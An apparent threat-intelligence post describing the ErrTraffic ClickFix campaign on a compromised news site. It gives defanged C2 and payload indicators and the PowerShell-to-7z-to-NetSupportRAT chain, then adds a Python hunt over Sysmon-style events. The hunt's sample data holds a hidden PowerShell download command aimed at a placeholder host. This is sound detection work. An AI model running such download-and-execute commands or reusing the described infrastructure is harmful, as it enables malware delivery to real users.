RE: https://infosec.exchange/@briankrebs/116780029181293028
Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate too. Inject is in main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resolved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.
TA also has a Mac payload configured, but it seems broken at the moment and asks for a password of some zip file when executed 🤷
Note: ErrTraffic is a ClickFix-as-a-Service, so other compromised sites can lead to other malware from other affiliates.
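Added detection example (not from the post above): a small hunt over Sysmon-style process creation events for the PowerShell -> 7z (password-protected extraction) -> dropped EXE chain described here. The events, paths, pids and the `<payload-domain>/<dynamic-path>` placeholders are constructed, not real telemetry or indicators.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style) modelling the chain:
# PowerShell fetches an encrypted 7z, runs 7z.exe with -p to unpack it, then launches the EXE.
# Domain and URI path are placeholders; pids/paths are made up for the example.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "iwr http://<payload-domain>/<dynamic-path> -OutFile $env:TEMP\pkg.7z"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\u\AppData\Local\Temp\7z.exe",
     "cmd": r"7z.exe x C:\Users\u\AppData\Local\Temp\pkg.7z -pSECRET -oC:\Users\u\AppData\Local\Temp\out -y"},
    {"pid": 400, "ppid": 200, "image": r"C:\Users\u\AppData\Local\Temp\out\setup.exe", "cmd": "setup.exe"},
    # Benign control: interactive extraction from Explorer, no password, no follow-on EXE.
    {"pid": 500, "ppid": 100, "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmd": r"7z.exe x C:\Users\u\Downloads\docs.7z -oC:\Users\u\Downloads\docs"},
]

SEVENZIP = ("7z.exe", "7za.exe", "7zr.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect_powershell_7z_chain(events):
    """Return findings for: PowerShell -> 7z extract with -p -> process launched by the
    same PowerShell from the extraction output directory (-o)."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if _basename(e["image"]) not in SEVENZIP:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) not in POWERSHELL:
            continue
        tokens = e["cmd"].split()
        # 7z "x"/"e" extraction with a -p{password} switch, i.e. an encrypted archive.
        if len(tokens) < 2 or tokens[1].lower() not in ("x", "e"):
            continue
        if not any(t.startswith("-p") for t in tokens[2:]):
            continue
        m = re.search(r"(?:^|\s)-o(\S+)", e["cmd"])
        if not m:
            continue
        out_dir = m.group(1).lower().rstrip("\\") + "\\"
        for child in events:
            if child["ppid"] == parent["pid"] and child["image"].lower().startswith(out_dir):
                findings.append({"powershell_pid": parent["pid"], "sevenzip_pid": e["pid"],
                                 "extract_dir": out_dir, "dropped_exe_pid": child["pid"]})
    return findings
```

A 7z.exe running from a user-writable directory (as in the sample) rather than an installed location is an additional, independent signal worth alerting on, since the loader fetches its own copy when none is installed.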


